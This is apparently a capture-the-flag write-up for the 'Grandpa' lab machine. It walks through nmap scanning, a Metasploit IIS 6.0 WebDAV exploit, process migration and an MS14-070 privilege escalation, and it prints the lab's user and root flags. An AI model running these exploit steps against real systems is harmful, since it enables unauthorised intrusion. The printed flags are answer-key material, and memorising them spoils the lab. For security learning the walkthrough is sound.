top of page
Search

Grandpa

  • Admin
  • Jan 5, 2022
  • 2 min read

Updated: Jul 10, 2023


As usual let's start with nmap:

nmap -sV -sC 10.129.95.233
ree

We can see that port 80 is open so let's check the website. Open your browser and type in the url bar : 10.129.95.233

ree

Let's do a curl to get more info:

curl -I 10.129.95.233
ree

We can see that the web server is on Microsoft-IIS/6.0.


I googled "IIS6 exploit" and found this article from rapid7:


Let's follow the steps in the article.


First, open a new command prompt and type the following to load metasploit:

msfconsole

As per the article let's type:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl
ree

show options
ree

We need to set LHOST and RHOSTS as they are required fields.


LHOST (local host) should be set with the IP of your machine. If you don't know the IP of your machine, you can find out using ifconfig. My machine's IP is 10.10.14.21, yours will be different.

set LHOST 10.10.14.21
ree

RHOST (remote host) is the target machine's IP:

set RHOSTS 10.129.95.233
ree

exploit
ree

It worked!


shell
ree

whoami
ree

We are nt authority\network service

Great!


The shell is not great though. We need to escalate our privileges now.


Lets exit to return to the meterpreter shell

exit
ree


Privilege Escalation


Let's use Lester, or Exploit Suggester. Lester is a module that scan the target for vulnerabilities. It is not actively exploiting them though, just scanning for them. However, you need to have a session opened on the target already to be able to use Lester. But we have a session already so let's try this.


run post/multi/recon/local_exploit_suggester
ree

We get several exploits - let's pick exploit/windows/local/ms14_070_tcpip_ioctl


But first, let's see what processes are running on the target machine:


ps
ree

We need to find a process that is running under NT AUTHORITY\NETWORK SERVICE


Let's pick davcdata.exe

ps | grep dav
ree

The process ID for davcdata.exe is PID 2768


Let's migrate to this process using:

migrate 2768
ree

background
ree

This tells us it is session 1

use exploit/windows/local/ms14_070_tcpip_ioctl
ree

set session 1
ree

show options
ree

set LHOST 10.10.14.21
ree

exploit
ree

It worked!!



shell
ree


cd C:\Documents and Settings\Harry\Desktop
dir
type user.txt
ree

bdff5ec67c3cff017f2bedc146a5d869


Congratulations! You found the user flag!


cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt
ree

9359e905a2c35f861f6a57cecf28bb7b

Congratulations! You found the root flag!

 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page